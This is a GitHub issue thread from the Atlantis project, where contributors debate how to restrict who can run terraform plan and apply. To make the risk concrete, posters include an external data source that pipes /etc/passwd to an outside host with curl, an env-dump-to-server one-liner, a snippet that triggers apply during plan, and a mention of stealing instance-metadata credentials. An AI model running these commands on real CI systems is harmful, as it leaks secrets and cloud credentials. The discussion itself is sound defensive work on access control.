Closed osterman closed 2 years ago
Could this also be extended into the other repository providers (e.g. GitLab)?
@darrylb-github any thoughts on this one?
@darrylb-github any thoughts on this one?
@osterman Yea we're hitting the same problems. We initially tried via protected branches and requiring approval in atlantis but this way you would have to protect all branches which doesn't work well.
Your proposal would solve this for us as well via the --gh-team-whitelist
option. I can't currently think of a better way to solve this.
Think it would be beyond my atlantis/go experience at the moment to attempt to implement this myself though, but it does feel a bit like a deal breaker at the moment unless we can find another workaround 🤔
Note I don't think its necessary to restrict plans though; it's the apply I'm worried about.
@aknysh on my team started working on this today. Will keep you posted.
In our case, plans also need to be restricted since the external data provider runs on every plan and can run any command.
I think the best way to implement this is to use a server-side Atlantis.yaml config (#47). I don't want to go the direction of server flags because it's not scalable. Inevitably someone is going to want a specific config for a specific Terraform repo/directory/workspace which they won't be able to accomplish with a global flag.
Unfortunately the server-side config isn't complete but I think this will have to wait for that.
Can't this already be achieved with github CODEOWNERS
?
Note I don't think its necessary to restrict plans though; it's the apply I'm worried about.
I agree the scary thing from a security stance are the ability to run local and remote exec blocks but those are not run during a plan.
I suppose longer term supporting commands like state (mv|rm)
comes to mind as well when they are added to atlantis.
We've implement this here: https://github.com/cloudposse/atlantis/pull/7
We're taking atlantis to the extreme. My goal is to have it on public repos so we can test modules. terraform plan
is dangerous. As long as you can access the external data provider, you can do anything you want. The external data provider runs necessarily on plan and will execute any command on the machine.
Best policy is to know exactly who can run apply
and plan
.
Unfortunately the server-side config isn't complete but I think this will have to wait for that.
@lkysow, I understand your position. As an architect of many systems, I struggle with it daily.
Guess from where I stand this is a hard stop, don't even consider using atlantis kind of problem that any one I talk to shares. They love the idea of atlantis
, but when I say "oh, and anyone with access to the repo can trigger an apply", it's a non-starter. Sometimes "what gets you here, doesn't get you there". I understand the desire to put this into the server-side config. But sounds like the scope of that is much greater. Adding a stop-gap measure to address a major liability from a security perspective is warranted IMO, even if it is longer-term not the ideal solution.
@osterman when you say if you can plan you can do anything you want can you expand? Local/remote exec blocks are not evaluated during a plan so any easy exfiltration and code execution can be stopped by requiring code review on it as long as you are using the --require-approval
serverside option and CODEOWNERS
. As CODEOWNERS
from github is evaluated based on your default branch (typically master) rather than what's in your branch/fork that you are proposing, this would require someone with repo access two pull requests to accomplish an attack with this and would require write protection as well as either an approval or privileges to bypass any branch protections. I can see the danger that they could write their own terraform provider that does pretty much anything they want. In the context of allowing it for only internal projects I think that would be sufficient but with it being external I can see why that would be a major concern.
but when I say "oh, and anyone with access to the repo can trigger an apply", it's a non-starter.
Agreed if that was the case, but like I said with a CLI arg and CODEOWNERS
you can gate the apply even if not the plan, there is still danger for your use case but at least the barrier of entry is much higher.
I understand the desire to put this into the server-side config.
If it's meant to be a meaningful protection it must be serverside (whether its a config option or CLI args) as otherwise an attacker can just change the permissions themselves.
I do see needing more fine grained access controls in the future to safely support public projects as well as when other commands are implemented such as state
, destroy
, etc.
oh, and anyone with access to the repo can trigger an apply
Can you explain why you think this is the case?
With --require-approval
you need to be able to approve a pull request prior to apply
. The list of approvers can be gated in all VCS providers.
Or do you mean that once a PR is approved, then anyone can apply? Which is true.
@osterman when you say if you can plan you can do anything you want can you expand? Local/remote exec blocks are not evaluated during a plan
Here's an example of using the external data provider to exfiltrate data during a plan
.
Providers are not like the local or remote provisioners. They can hook into any part of the terraform lifecycle. In this case, the external data provider hooks into the plan cycle so that it can source data from external commands (e.g. a python script).
Here's an example of exfiltrating the first line of the /etc/passwd
file (useless these days), to an external site http://exfiltrate.requestcatcher.com/test
Running terraform plan
on the following will result on this command getting executed. It's run in the same context as an apply
(e.g. EC2 instance profiles or ECS task roles), so presumably with all the same AWS credentials etc. It could be much worse.
# https://www.terraform.io/docs/providers/external/data_source.html
data "external" "example" {
program = ["/bin/bash", "-c", "(head -1 /etc/passwd | curl -XPOST -d@- http://exfiltrate.requestcatcher.com/test >/dev/null); echo {}" ]
query = { }
}
@majormoses CODEOWNERS you can gate the apply even if not the plan, there is still danger for your use case but at least the barrier of entry is much higher.
This may be true on GitLab or other VCS, but not on GitHub. Per the atlantis documentation anyone can approve a pull request. As far as I understand, the CODEOWNER
only gates merging.
@lkysow With --require-approval you need to be able to approve a pull request prior to apply. The list of approvers can be gated in all VCS providers.
Maybe there's some extra toggle somewhere in GitHub that further restricts approvals across the board. I won't rule it out.
This also seems to be the case per the CODEOWNERS
documentation.
they also can optionally require approval from a code owner before the author can merge a pull request in the repository
But the fact remains, a terraform plan
can today execute any command.
If it's meant to be a meaningful protection it must be serverside
Sorry, that was my own ambiguity. I was referring to args passed to atlantis server
.
@aknysh on our team has implemented this here: https://github.com/cloudposse/atlantis/pull/7
Since it didn't seem like it was going to be accepted (per the earlier discussion), we didn't open a PR against runatlantis/atlantis
Now, what would be truly nasty is to curl http://169.254.169.254/latest/meta-data/iam/security-credentials/...
and exfiltrate those STS credentials and thus have carteblanche remote access to AWS with whatever privileges are given to atlantis.
This may be true on GitLab or other VCS, but not on GitHub. Per the atlantis documentation anyone can approve a pull request. As far as I understand, the CODEOWNER only gates merging.
So from what I remember (I could be wrong or not remembering correctly) if you set branch protection to use CODEOWNERS
it affects the mergable
state and atlantis uses this to determine if you can apply so anyone who has write access to the repo but is not a CODEOWNER
s review does not count. I can try to setup a test to validate this.
@majormoses that would be cool - would love confirmation if that's how it works. If so, the atlantis documentation may be misleading since the red warning dialog seems to say something different. However, since I could run the following in a terraform plan
to trigger a terraform apply
, it makes no effective difference to a bad actor. We need a plan_requirements
section as well.
data "external" "example" {
program = ["/bin/bash", "-c", "terraform apply>/dev/null 2>&1); echo {}" ]
query = { }
}
But the fact remains, a
terraform plan
can today execute any command.
It wouldn't be very useful if it couldn't and I agree on the need to restrict that further especially with implementing additional commands state
, destroy
, etc. Just trying to figure out if the current protections are meaningful enough for internal projects where its more to prevent naive users from doing bad things as opposed to malicious actors.
I have direct knowledge of a company who had 2 developer accounts hacked on the same weekend a few months back. Both had mandatory MFA enabled on their GitHub and Google email accounts. In their case, a social engineering attack allowed SIM jacking. A white list is not perfect. MFA would be better. But I'm just talking baby steps right now. Reducing the attack surface by restricting the number of engineers that can plan/apply changes (at least to production) makes me feel better.
I just tested and it looks like it does not look at the mergability state to determine if the apply can be run @lkysow is that a bug or intended I might be remembering wrong but I seem to recall us talking about this a while ago.
Found it, it was something being discussed but not yet implemented: https://github.com/runatlantis/atlantis/issues/43 @osterman if that was implemented would that solve most of your concerns? While it still relies on trust from github and a compromised account with enough privs could certainly disable protections I think this would be a huge step in the right direction and should not be too hard to implement I would think. One of the benefits of this approach is that it works with github and gitlab (not sure if bitbucket or other VCS providers have similar concepts) so it would help the most people for the least amount of effort.
Btw, the GitHub Universe conference is happening this week. Heard through the grapevine that better RBAC is coming (fingerscrossed!) That said, same source said GitHub was not coming out with CI/CD and we know how that turned out. =P
@majormoses Re: #43, yes & no. I agree 100% with the intent of #43. Mergability should be a criteria for apply
when we say approved
; though perhaps an additional requirement . However, it's not configurable enough.
apply_requirements: [approved, mergable]
If you take a look at our proposed solution in this PR: https://github.com/cloudposse/atlantis/pull/7 it scales somewhat better in terms of flexibility.
atlantis server --gh-team-whitelist=dev:plan,ops:apply,devops:*
This says that a team called dev
can run plan
, and the team called ops
can run apply and a team called devops
can do anything. Now, if we introduced a new verb like destroy
, that could easily be tied to another team.
Granted, if a user wants to do full-on RBAC per workflow/step/etc, it's a very slippery slope.
I admit that this is kind'a GitHub centric approach. We needed something before 10/25 =)
@osterman makes sense I agree that more granular is better and hope github RBAC is gonna improve although it will probably mean tons of refactoring again at my org.
There are several things to consider with the proposed approach. At my current organization we have 85 teams (and that might actually go up quite a but as we are breaking up some of our larger teams) so providing even 15-20 teams seems like not the best solution for CLI arg though with a config file that might be OK. How would we handle sub/child teams? The more you specify on the command line, the more it is exposed to the process table which is accessible to any user and could be used to plan the next attack. I generally recommend providing anything sensitive (secrets, team names, repo names, permissions, etc) to be specified via a config file, ENV var, or pulled from a secret manager directly (such as hashicorp vault, aws ssm, etc).
Granted, if a user wants to do full-on RBAC per workflow/step/etc, it's a very slippery slope.
I don't think atlantis should be in the business of providing real RBAC for this very reason. In its current state I'd say it's best to let some external process push status checks to your VCS provider and using the mergable
status it gives to determine if it can perform an action or not. At some point it might make more sense to try to flesh out more of a full RBAC solution but I think atlantis should provide "good enough" (highly subjective what that means) security and focus on other core improvements. I do agree that in the context of adding new commands outside plan/apply we need something more robust.
Anyways that's just my $0.02
Wow, a lot to read here and I agree with both of you. I'm going to write up a bigger response with some plans to move forward so don't think I'm ignoring this, just crafting it!
oh, and anyone with access to the repo can trigger an apply
Can you explain why you think this is the case?
With --require-approval you need to be able to approve a pull request prior to apply. The list of approvers can be gated in all VCS providers.
I don't know of a way to do this with Bitbucket (Server / Data Center). You can have a list of required approvers for a merge, but anyone can be added as a reviewer and then approve it.
-- Kip
For those interested, we have a prototype of --gh-repo-whitelist
available here (with binary releases): https://github.com/cloudposse/atlantis/releases
See pulls: https://github.com/cloudposse/atlantis/pulls
It also includes a number of other experimental features like --wake-word
and --repo-config
@majormoses @lkysow Would you be able to explain how CODEOWNERS
help? It appears to be ignored by Atlantis.
Right now it doesn't.
When #43 is fixed (#385 was just opened to fix it), then you can make mergeability
an apply_requirement
and then make approval by CODEOWNERS
required for a pull request to be mergeable.
I'm excited about #385 ! It's a step in the right direction.
Not to beat a dead horse, just want to emphasize that without something like plan_requirements
, we're still very exposed since any command can be executed as part of plan
. I don't want companies having a false sense of security. Full context of previous discussion available here.
@osterman I feel you, I don't think you are beating a dead horse. I agree we need something more but it's a good start and leaves room for improvement. Would using the mergeable
field work for gating plans via a plan_requirements
config option satisfy your needs? I'm still of the opinion that we should have the VCS providers (through mechanisms such as CODEOWNERS
) keep track of lists of people as chances are they are already being tracked and updated. Trying to reduce the duplication as much as possible.
@osterman I wonder if there could be some conditions around when to execute plan
automatically. Or do you consider all resources as (not just data
, local
, ...) as dangerous?
thanks @majormoses !
Would using the mergeable field work for gating plans via a plan_requirements config option satisfy your needs?
Let's try to codify our "cloudposse" requirements:
plan
(it could be CODEOWNERS
, but could also be opened up to a larger trusted group)CODEOWNERS
the need to restrict who can run apply
is sufficiently addressedSo as a stop gap measure, I think plan_requirements
would work actually. It just puts more onus on CODEOWNERS
to also run plan
.
I'm still of the opinion that we should have the VCS providers (through mechanisms such as CODEOWNERS) keep track of lists of people as chances are they are already being tracked and updated.
Yes, that would be my top choice as well.
Another idea would be to require a certain number of CODEOWNERS
to approve a PR for apply
to work (configurable). And then another number of approvals to allow plan
to work. This then implements a sort of two-man rule. Haven't through this through too much; just trying to see how we could stick within the confines of the CODEOWNERS
and approvals framework.
e.g.
apply
requires 2 approvals from CODEOWNERS
plan
requires 1 approval from CODEOWNERS
I wonder if there could be some conditions around when to execute plan automatically. Or do you consider all resources as (not just data, local, ...) as dangerous?
@estahn would prefer not to go down this path of evaluating resource safety because we use atlantis for not just terraform. Also, with external commands, I don't think there's any practical way to achieve this.
Another idea would be to require a certain number of
CODEOWNERS
to approve a PR for apply.
You can actually do that via branch protections:
That does not address different plan vs apply requirements but you could satisfy a two man switch via means already (or shortly) available.
We would like to allow anyone (contributor, public, etc) to open a PR (but not anyone to run plan or apply)
That sounds pretty doable with the current framework
We would like to allow a specicific list of users to run plan (it could be CODEOWNERS, but could also be opened up to a larger trusted group)
Sounds like adding plan_requirements
and mergable
satisfies the first portion, for the second portion what would you envision? Would it be anyone with write access to a repo (we probably need admin permissions on the repo to determine that) or a list?
With #385 and CODEOWNERS the need to restrict who can run apply is sufficiently addressed
:+1:
What is the status of this thread? My company is seriously looking at implementing Atlantis and knowing the outcome of this discussion seems pretty important. @majormoses @lkysow @osterman
The "mergeable" option has been released, this allows you to disable auto planning and relying on branch protections (such as CODEOWNERS
with multiple reviews) to gate running a plan. While it does not address the specific request and I agree it still needs to be added but I think this should address most of the concerns around this in its current state. I think this will be an important prerequisite to introducing new features that allow state manipulation (import
, rm
, mv
, etc). I won't speak for @lkysow or @osterman but I don't see this as critical to implement right now without looking at adding additional state commands beyond plan and apply.
@justinhauer do those address your concerns? If not I would like to understand your use case and flow.
@majormoses I just want to be cystal clear with your comments here (I think it addresses my needs).
1) If I disable auto planning, I can require review/approval to run atlantis plan
2) I can have a member of CODEOWNERS
be required to be one of the reviewers of each review/approval stage?
3) The same would apply to atlantis apply
- needing a member of CODEOWNERS
to approve?
Or did I misinterpret 2 and 3, and I can't restrict who can approve, I can just set the review to multiple persons?
Actually sorry I misspoke, it's been a while and keeping track of the various conversations, issues, pull requests, etc in my head has been difficult. I think the next step is introducing a plan_requirements
similar to apply_requirements
and then use the mergeable
option to gate 1. You can currently fulfill 2 and 3 currently via CODEOWNERS
, branch protections, and apply_requirements
.
I will say that I am pretty comfortable with my use case for my org at the moment because we do not have any public repos that we hook up to atlantis and at the moment we are only using it for github management itself. Given the fact that they would need to compromise the github accounts (which as Erik pointed out is certainly doable), know enough about some of the ways that external data sources can be abused in a plan, etc to circumvent current protections. This obviously is easier on a public project since they intrinsically can run a plan without compromising any accounts.
This can be accomplished via a custom server-side workflow now:
workflows:
custom:
plan:
steps:
- if [ $USERNAME != "username" ]; then exit 1; fi
- init
- plan
I've been doing a little bit of research into Atlantis recently and came upon this thread - for what it's worth, I believe running Atlantis with terraform plugins pre-installed and init
ing with -get-plugins=false
could mitigate the issues raised with plan
.
By pre-installing plugins, administrators could remove the ability to use the external
provider, which is likely not necessary for most installations. There is some info here. From what I'm reading it's possible to use Atlantis' custom workflows to add these additional parameters.
@ericnorris hmm I am not sure that would help as you could still leverage something that the system would have available. See the following comments:
These examples I think clearly illustrate the issue, essentially it highlights the danger of any CI system. It allows arbitrary code injection, if it did not it would not be very flexible. An attacker essentially needs nothing more than to say dump the env vars (essentially env | curl -XPOST some_server -d @-
), cat a tfvars file, etc and then exfiltrate the data in some way. Probably sending a post via curl is one of the less detectable methods but they could simply add it as an output and get the data via the VCS provider comment on the PR. The fact is whatever is on the system for legitimate users are available for abuse as well. On most systems that will minimally be some form of shell as well as some additional scripting languages installed by the OS or admin (python, perl, ruby, etc). While I think -get-plugins=false
does solve some security concerns it only addresses part of the concerns here. I am all for layering protections but I don't want to give a false sense that this would fully address the problems outlined here.
@majormoses, unless I'm mistaken, all of those examples use the external
provider, no? It is not a built-in provider, and is downloaded automatically from here. If you don't install that plugin, and limit terraform
to only using pre-installed plugins, you cannot exfiltrate data during plan
using external
.
I understand that there may be other ways (e.g. local-exec
provisioners) but I believe you will be safe during the plan
stage if you only use providers that do not provide arbitrary code execution during the plan stage.
@ericnorris you are correct (as long as client side config is disabled) I thought it was a default included provider. I suppose if someone is using an old enough version of terraform where the plugins were embedded that would be an issue. That being said it's not something we can control and they should be encouraged to upgrade anyways. There are some cases where an external data source would be required. I think one could add a custom workflow to have it available for a specific state I suppose for that and default to a plugin directory. That being said if it's installed on the system and you allow client (repo side) config all bets are off. If you enable client side config, they can simply include it in the repo (as a local path) and modify the workflow to use a local repo bypassing all the administrative protections.
Given this I think that it makes sense as it minimally solves the bulk of the concerns if not in its entirety. @osterman I think we still should implement some more controls around different atlantis commands (which I see as a blocker to implement additional state modification commands such as state rm
, state rm
, import
, etc) but are there any other holes I am not seeing by changing the init commands to not download plugins? This at least forces the administrator into intentionally allowing remote code execution so I think minimally it's a good step in the right direction.
One question I have is should this be exposed as a first class config property or simply rely on server side defined custom workflows and document how to accomplish that? I assume if we expose it we should default to existing behavior as to keep backwards compatibility.
This can be accomplished via a custom server-side workflow now:
workflows: custom: plan: steps: - if [ $USERNAME != "username" ]; then exit 1; fi - init - plan
This solution works for us as well. I just would like to add having the Github teams the user is assigned to available as a variable would make this more flexible and easier to maintain.
@svenwb does this work with bitbucket too? will $USERNAME have bitbucket username?
@svenwb does this work with bitbucket too? will $USERNAME have bitbucket username?
Yes it will.
amazing! So if I wanted to run apply and destroy with the default behavior and just add a check for an allowed list of users I would just have to do this right?
apply:
steps:
- run: echo 'Checking Bitbucket user is allowed to run atlantis apply'
- run: "if [ $USERNAME != "username" ]; then exit 1; fi"
- init
- apply
destroy:
steps:
- run: echo 'Checking Bitbucket user is allowed to run atlantis apply'
- run: "if [ $USERNAME != "username" ]; then exit 1; fi"
- init
- apply
what
why
proposal
add the following flags.
Allow an explicit set of users.
Allow teams in an organization
The arg convention is piggybacking on the existing convention of
--repo-whitelist
and that all github features are prefix with--gh-*
an alternative interface could be based on
CODEOWNERS
, but I think that will be more work to implement.